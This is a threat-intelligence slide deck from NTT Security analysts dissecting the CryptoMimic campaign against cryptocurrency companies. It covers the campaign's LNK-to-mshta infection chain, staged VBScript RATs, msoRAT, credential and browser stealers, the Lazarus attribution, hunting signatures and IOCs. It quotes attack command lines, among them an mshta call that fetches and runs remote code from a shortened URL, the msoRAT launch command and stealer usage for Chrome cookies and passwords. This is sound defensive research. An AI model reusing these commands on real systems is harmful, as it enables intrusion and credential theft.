Unveiling the CryptoMimic 2020/09/30 - 2020/10/03 Hajime Takai, Shogo Hayashi, Rintaro Koike About Us Hajime Takai ⚫ SOC & malware analyst at NTT Security (Japan) KK ⚫ Speaker of Japan Security Analyst Conference 2020 Shogo Hayashi ⚫ SOC & malware analyst at NTT Security (Japan) KK ⚫ Responding to EDR detections and creating IoCs ⚫ Co-founder at SOCYETI Rintaro Koike ⚫ SOC & malware analyst at NTT Security (Japan) KK ⚫ Founder & researcher at nao_sec 2 Motivation & Goal CryptoMimic attacks worldwide companies ⚫ Especially targeting crypto currency companies ⚫ Very active since around April 2018 Extremely difficult to observe the attack ⚫ Several research reports was published ⚫ However, they only dealt with the initial part of the attack We succeeded in observing the attack deeply ⚫ CryptoMimic uses unknown malwares ⚫ Trying to unveil the CryptoMimic’s profile or attribution 3 CryptoMimic Profile Also known as ⚫ Dangerous Password, CageyChameleon, Leery Turtle, CryptoCore Targeting financial organizations ⚫ Especially crypto currency companies ⚫ Since around April 2018 Mysterious attack group ⚫ Very active but cautious ⚫ No one has research in detail 5 TTPs Majority of attacks start with an email or LinkedIn message ⚫ The URL is written in the message body ⚫ The message is prepared for each target ➢ E.g. pretend to be sent by CEO of target organization or recruiter from other companies If click the URL, a zip file is downloaded from cloud service ⚫ Such as OneDrive or Google Drive 6 TTPs Downloaded zip file includes document file and LNK file ⚫ In many cases, the LNK file name is something like “Password.txt.lnk” ⚫ And the document file is password-protected Open LNK file to know the document file’s password Open the document file -> Password-protected 7 TTPs ① mshta.exe ② Redirect C&C Server ③ Execute Cabbage RAT-A,B,C ④ Check victim environment ⑤ Execute msoRAT ⑥ Steal Sensitive Information Victim Attacker 8 TTPs Besides LNK file ⚫ Using document file with macro ⚫ CHM file 9 Analysis Overview Attack flow A victim get infected with multiple malwares originated from LNK file 11 File list The first half of the attack has similarities to CryptoMimic’s attack Item File name File type Past report Downloader-A Password.txt.lnk lnk file Exist Dropper (fileless) VBScript Exist Decoy Password Password.txt txt file Exist Downloader-B Xbox.lnk lnk file Exist Cabbage RAT-A kohqxrz.vbs VBScript Exist Cabbage RAT-B (fileless) VBScript Exist Cabbage RAT-C (fileless) VBScript Not Exist Brower Info Stealer RuntimeBroker.exe exe file Not Exist msoRAT NTUser.dat dll file Not Exist Credential Stealer bcs.dll dll file Not Exist Judging from these similarities,we concluded that the attack group was CryptoMimic. The existing reports report that CryptoMimic used these files in the past. 12 File list Unknown malware were used in the second half of the attack Item File name File type Past report Downloader-A Password.txt.lnk lnk file Exist Dropper (fileless) VBScript Exist Decoy Password Password.txt txt file Exist Downloader-B Xbox.lnk lnk file Exist Cabbage RAT-A kohqxrz.vbs VBScript Exist Cabbage RAT-B (fileless) VBScript Exist Cabbage RAT-C (fileless) VBScript Not Exist Brower Info Stealer RuntimeBroker.exe exe file Not Exist msoRAT NTUser.dat dll file Not Exist Credential Stealer bcs.dll dll file Not Exist Unknown malwares never reported before. We successfully acquired new knowledge on CryptoMimic.13 Timeline We successfully observed attacker’s activity after malware infection ⚫ The whole attack was completed within around three hours. ⚫ The attacker deleted windows event log to eliminate the trace of the attack. Time Subject Description 2020/2/21 09:33 Downloader-A Dropper was download and executed. 09:33 Dropper 3 files were dropped. Cabbage RAT-A initiated HTTP access to C&C Server. 10:30 Cabbage RAT-A Cabbage RAT-B was downloaded and executed. 10:30 Cabbage RAT-B Cabbage RAT-C was downloaded and executed. 11:15-11:34 Cabbage RAT-C Browser Info Stealer was downloaded and executed. 11:38-11:40 Cabbage RAT-C msoRAT was downloaded and executed. 11:47 msoRAT Something was injected into lsass.exe process. 12:23 - 2020/2/21 12:43 lsass.exe Windows event log was deleted via wevutil.exe. Malwares and some files were deleted. Some malwares process was terminated. 14 Windows commands Same as normal APT attack, the attacker used windows standard commands Command cmd.exe cmdkey.exe copy.exe find.exe ipconfig.exe net.exe group net.exe localgroup net.exe user Command net.exe view netstat.exe ping.exe rmdir.exe systeminfo.exe whoami.exe whoami.exe 15 Analysis Detail Attack flow Topic from the next slide 17 Downloader-A LNK file that downloads dropper ⚫ LNK file whose name was “Password.txt.lnk” ⚫ Downloaded and executed Dropper (HTML file with VBScript embedded) ➢ Downloaded Dropper using mshta.exe. ➢ Download URL was shortened by Bitly. C:¥Windows¥System32¥cmd.exe /c start /b %SystemRoot%¥System32¥mshta https://bit.ly/37qt5MM Target 18 Attack flow Topic from the next slide 19 Dropper VBScript dropper that generated three files ⚫ Displayed text file that included password for decoy document file with notepad.exe. ⚫ Generated Downloader-B and place on startup directory for persistence. ⚫ Generated and executed Cabbage RAT-A. 20 Dropper-Dropped file (Decoy doc password) Text file that included password for decoy document file ⚫ Open text file created by echo command with notepad. ➢ In the CryptoMimic's past attack, a zip file downloaded via a link embedded in email body includes password-protected decoy document file and LNK file (Downloader-A). ➢ We couldn’t get decoy this time, but if the attack method was the same, the contents of the text file opened by notepad.exe was password for decoy document file. 21 Dropper-Dropped file (Downloader-B) LNK file similar to Downloader-A ⚫ LNK file whose name was “Xbox.lnk”. ⚫ Downloaded and executed the file downloaded from Bitly URL using mshta.exe ⚫ Placed on startup director for persistence. C:¥Windows¥system32¥mshta.exe https://bit.ly/2TVSZnE Target 22 Dropper-Dropped file (Cabbage RAT-A) RAT written in VBScript ⚫ Send HTTP request to C&C server, and execute the code included in response data using Execute() method. Fig.) Cabbage RAT-A code 23 Security product detection by Dropper It can detect security product and change behavior accordingly Fig.) Code executing Cabbage RAT-A Collect process name list Check whether there is process name for KingSoft Anti-Virus or Net Protector If there is, it execute Cabbage RAT-A using cscript.exe. Fig.) Code persisting Downloader-B If process name for Qifoo 360 was included in the process name list, it deletes Downloader-B and doesn’t perform persistence. 24 Why we named “Cabbage RAT”? Because one VBScript RAT creates another VBScript RAT by stages, we named them Cabbage RAT after their characteristics Cabbage RAT 25 Attack flow Topic from the next slide 26 Cabbage RAT-B RAT written in VBScript ⚫ Can send victim’s information to C&C server periodically. ⚫ Can perform tasks in accordance with the data received from C&C server. 27 Data Cabbage RAT-B sends It sends victim’s information once every minutes in the following format. Fig.) Information that Cabbage RAT-B sends to C&C server 28 Cabbage RAT-B command list It has function to execute VBScript code and terminate itself. Response Data Description Includes string #20 Download VBScript code from target included in the response. “21” Stop Cabbage RAT-B. Includes string #23 Execute VBScript code included in the response. The code is encoded by Base64. 29 Cabbage RAT-C RAT written in VBScript ⚫ Can perform tasks in accordance with the data received from C&C server. ⚫ Certain condition must be satisfied to make it perform tasks ordered by C&C. 30 Cabbage RAT-C ⚫ It is full-featured RAT and has more functions than those of Cabbage RAT-A or Cabbage RAT-B. ⚫ The group executed windows commands using Cabbage RAT-C. ID Option Description “s” “k” Stop Cabbage RAT-C. “s” (number) Set Interval for accessing. “l” “/” Send Directory Information. “l” (directory path) Upload File. “c” (command) Execute WSH command. “cd” (directory path) Set current directory. “ps” (VBScript code) Execute VBScript Code. ID Option Description “psi” (encoded VBScript code) Execute Encoded VBScript Code. “r” (path) Delete directory or file. “e” (command) (arguments) Execute WSH command. “u” (filepath) Download File. “d” (filepath) Encode and Upload File. “k” Do nothing. This would be one of the main RATs that CryptoMimic uses 31 Cabbage RAT-C flow chart Without receiving data “1”, it won’t start executing commands. Send HTTP-Request to attacker server Received data is “1” Send HTTP-Request to attacker server Execute command according to received data Fig.) Cabbage RAT-C flow chart 32 Attack flow Topic from the next slide 33 Browser Info Stealer Malware that steals Google Chrome cookie and password ⚫ Target or format can be controlled by arguments. Option Description -c Extract all stored cookie to a file. -c2 Extract all stored cookie to a file in different format. -g Extract stored cookie for domains related Google to a file. -p Extract stored password to a file. Fig.) List of options passed as second argument Fig.) Sample usage of argument for Browser Info Stealer format: RuntimeBroker.exe (profile_path) (option) (output_path) example for extract cookie: RuntimeBroker.exe “C:¥Users¥public¥AppData¥Local¥Chrome¥User Data¥Default” -c C:¥Users¥public¥c.dat 34 Change of Chrome encryption method Google Chrome’s Encryption method for cookie and password was changed.(*) ⚫ Prior to Chrome 80 : Use CryptUnprotectData WINAPI ⚫ Beyond Chrome 80 : Use AES Browser Info Stealer’s decryption method will be changed to AES accordingly. (*) https://blog.nirsoft.net/2020/02/19/tools-update-new-encryption-chrome-chromium-version-80/35 Attack flow Topic from the next slide 36 msoRAT DLL file that has RAT function ⚫ Access to a file with characteristic name, “msomain.sdb” ⚫ Packed. ⚫ Arguments are obfuscated. ⚫ Calling WINAPI is obfuscated. ⚫ Can perform tasks in accordance with the order received from C&C server. 37 Why we named “msoRAT”? It comes from the file name it accesses to ⚫ It comes rom the read/write target file path in accordance with the order from C&C server. ⚫ We found file path in config (structure in memory) of msoRAT. Fig.) Memory dump of config of msoRAT C:¥windows¥apppatch¥msomain.sdb 38 msoRAT packing ⚫ There are nine section headers. ⚫ It is only “.dat1” section and “.reloc” section where code or data exists. Fig.) Analysis result of msoRAT by PEView It is only “.dat1” section and “.reloc” section where code or data exists. There are nine section headers 39 msoRAT packing As a result of executing unpacking code included in “.dat1” section, valid code or data is set to “.text” or other sections. Fig.) .text section before unpacking Fig.) .text section after unpacking 40 msoRAT argument obfuscation ⚫ msoRAT arguments are encrypted using Base64 and RC4. ⚫ Decrypting encrypted arguments revealed that there are four arguments. ➢ The meaning of the first two arguments remains unknown. ➢ The last two arguments represent IP address and port number of C&C server. 506706672 506716871 5.77.252.61 443 C:¥Windows¥system32¥cmd.exe “rundll32.exe c:¥Users¥public¥NTUser.dat,#1 4pG2hIBvptiLeqF7MtBTTJ2fMSIlkJXBFH/9upgop6tiD3o=“ Fig.) Command that Cabbage RAT-C launches msoRAT decrypting IP address port number 41 msoRAT obfuscation towards calling WINAPI (1) ⚫ The process is obfuscated using multiple jmp instructions 42 msoRAT obfuscation towards calling WINAPI (2) It calls WINAPI without using call instruction ⚫ WINAPI is called using xchg instruction and retn instruction. ① ② ③ ④ ⑤ ①-③ Calculate the address where target WINAPI function is loaded. The result is stored in register RSI. ④ The WINAPI function address stored in register RSI is moved on top of the stack. ⑤ The WINAPI function address stored on the top of stack is poped to register EIP, which result in calling target WINAPI function. 43 msoRAT command list ⚫ All the functions that a standard RAT has are implemented. ⚫ Compared to Cabbage RAT-C, msoRAT has more functions that require WINAPI. Id Description 43E04420456043D Send infected machine information. 43E044204340440 Send drive information. 43A043004400435 Set current directory. 437043C043A0430 Send file info. 43F043E04310440 Execute command with SeDebugPrivilege. 432043804420438 Delete file. 447044004320444 Change file date information. 7A0441043A0430 Compress and upload file. Id Description 441043A04300447 Upload file. 437043004320430 Download file. 442043E0437043E Send process information. 43F044004320431 Terminate process with PID. 43F0440043E0433 Add registry. 43E0442043A043E Compress and send "msomain.sdb“. 43D0430043A043E Write data to "msomain.sdb“. 434043E00700065 Inject PE file to explorer.exe. 4450440043F0435 Execute Browser Info Stealer. Note : This is partial list. Please refer research paper for complete list. 44 Attack flow Topic from the next slide 45 Credential Stealer DLL file that steals credentials ⚫ Packed with Themida. ⚫ Persistence was achieved by using Windows standard function, Security Package system. 46 Packing Credential Stealer It was packed by Themida 47 Persisting Credential Stealer Security Package system was abused for persistence ⚫ Security Package is a system to implement authentication system by third parties. It is known that it could be used to steal credentials. [2] ⚫ Though we couldn’t observe any activity by Credential Stealer, we think that this malware has a function to steal credentials because it used Security Package system. Fig.) Credential Stealer persisting command 48 Attribution Attribution Targeting financial industry ⚫ Especially crypto currency companies ⚫ It can estimate that CryptoMimic’s objective is earning money Similar to Lazarus reported by Proofpoint https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new50 Attribution Similar to Lazarus’ LNK file Lazarus’ LNK file CryptoMimic’s LNK file 51 Attribution Similar to Lazarus’ CHM file CryptoMimic’s CHM file Lazarus’ CHM file 52 Attribution Using Bitly heavily ⚫ Adding “+” at the end of URL provides extra information ➢ Including created time ⚫ Similar to Lazarus’ working hours reported by Lexfo CryptoMimic’s Bitly URL Creation Time Lazarus’ Compilation Timestamps 53 Attribution We analyzed bfcsvc.dll, the file said to have had the relationship with Lazarus. Fig.) VirusTotal Detection Page Fig.) Intezer Analysis Result 95.83% Lazarus Fig.) Twitter Lazarus Fig.) VirusTotal Community Page Lazarus bfcsvc.dll Multiple AV software detected bfcsvc.dll as NukeSped, known to have been used by Lazarus 54 Attribution We found similarities between bfcsvc.dll and msoRAT or Credential Stealer ⚫ Similarity with msoRAT ➢ Use same packer (section name, number of sections and size are similar) ➢ Use same obfuscation method for WINAPI (use multiple jmp instruction instead of call instruction) ➢ Both of them access to ”%WINDIR%¥apppatch¥msomain.sdb”.(*) ⚫ Similarity with Credential Stealer ➢ Name of DLL is the same (bnt.dll). ➢ Both use ”Security Package” Regarding to “Security Package”, besides bfcsvc.dll, it was also used in malware “HOPLIGHT” that HIDDEN COBRA (aka. Lazarus) used (*) https://hybrid-analysis.com/sample/777f03eda81f380b0da33d96968dcf9476e6e10459a457f107fec019bc26734b 55 Attribution Data wiping ⚫ CryptoMimic deleted all the data as soon as completing attack on our observing environment. ⚫ Lazarus took similar activity in the past. 56 Attribution We listed several similarities so far. All of them implies the relationship between CryptoMimic and Lazarus, but they just “imply” and don’t prove anything. But we believe that there is relationship between these two groups to some extent. 57 Defense ©) NTTSecurity Defense Hunting & Defense LNK file name ⚫ In most cases, CryptoMimic’s attack starts with LNK file. ⚫ The group keeps using file name such as ”Password.txt.lnk” or ”パスワード.txt.lnk” continuously. ⚫ It would be good idea to try detecting LNK files with these names. 59 Hunting & Defense LNK file Volume Serial Number ⚫ These values would work as signature to a certain degree. Volume Serial Number Parsing Path Date Modified F2C4D353 C:¥Windows¥System32¥cmd.exe 02/13/2020 02:10:28 64C0E1A7 C:¥Users¥Public¥Downloads¥Lists¥Password.txt 02/23/2020 04:14:58 C4B156EA C:¥Users¥Public¥System¥New Text Document.txt 01/23/2020 02:51:53 C6192C1F C:¥Windows¥System32¥mshta.exe 03/19/2019 04:45:40 DE285B24 C:¥Windows¥System32¥cmd.exe 08/07/2019 04:27:35 32F76E3A Y:¥Works_2018¥16.June¥06.22¥Trading Sheet (June 2018)¥ReadMe.txt 06/22/2018 06:45:29 CE1FA155 Y:¥Works_2018¥16.June¥06.22¥Trading Sheet (June 2018)¥ReadMe.txt 06/22/2018 06:45:29 1AEEE0BD C:¥Users¥BEST¥Desktop¥vbox_share¥vaccine¥js¥1.txt 08/09/2017 02:34:55 60 Hunting & Defense URL Pattern ⚫ URL pattern used to communicate with C&C server would work as relatively static signature for a long time. URL Path Date /edut?id= 2019/12~ /open?id= 2018/10~2019/12 /search.php? 2018/8 /content.php? 2018/4 61 Conclusion CryptoMimic ⚫ APT attacking group working from around 2018. ⚫ The group targets on financial organizations related to crypto currency companies. ⚫ The attack begins with email or LinkedIn message. Malware ⚫ The initial file is either LNK file, document file with macro or CHM file. ⚫ Environment checking and data theft are performed by Cabbage RAT. ⚫ Further advanced attack is performed using msoRAT. Attribution ⚫ The group’s objective and attacking method share similarities with Lazarus ➢ There might be relationship between these two groups. 62 Thank you ©) NTTSecurity Thank you Appendix ©) NTTSecurity Appendix IOC ⚫ Hash ➢ 561f70411449b327e3f19d81bb2cea08 ➢ 44f5090d432c28b6e69f9b80d570af56 ➢ ce09cdb7979fb9099f46dd33036b9001 ➢ d637368f523fd822b97b97860389ebef ➢ c733044cde5f6a359a6e4d30d64eb6df ➢ 7c31fadd10a686f790c9f4842c074c17 ⚫ IP and Domains ➢ mail.gmaildrive[.]site ➢ ac-2501.amazonaws1[.]info ➢ 103[.]205.179.4 ➢ 125[.]234.250.236 ➢ 5[.]77.252.61 65 msoRAT v.s. bfcsvd.dll Both uses same packing method ⚫ Same section header number, similar header name. ⚫ Both has only two sections that has code or data. ⚫ The section name that executes unpacking is also similar. msoRAT bfcsvc.dll Nine section headers Nine section headers ・Only these two sections have code and data. ・Unpacking code is included in .dat1 section. ・Only these two sections have code and data. ・Unpacking code is included in .dat1 section. 66 msoRAT v.s. bfcsvd.dll WINAPI obfuscation method is almost the same. ⚫ Use multiple jmp instructions. ⚫ Use xchg instruction and retn instruction instead of call instruction. msoRAT bfcsvc.dll Use xchg and retn instead of call Use xchg and retn instead of call 67 msoRAT v.s. bfcsvd.dll Both access to”%WINDIR%¥apppatch¥msomain.sdb” ⚫ Analysis result by Hybrid Analysis revealed that they also access to bfcsvc.dll. ”%WINDIR%¥apppatch¥msomain.sdb” 68 Credential Stealer v.s. bfcsvd.dll Same DLL name ⚫ Both use ”bnt.dll”. Credential Stealer bfcsvc.dll 69 Credential Stealer v.s. bfcsvd.dll Both have function related to Security Package ⚫ Functions relate to Security Package such as “SpInitInstance” or “SpLsaModeInitiate” are implemented. Credential Stealer bfcsvc.dll 70 Attribution Cabbage RAT ⚫ Multi-stage VBScript RAT ⚫ Cabbage RAT-B is similar to PowerRatankba.A ➢ Commands ➢ URL Pattern 71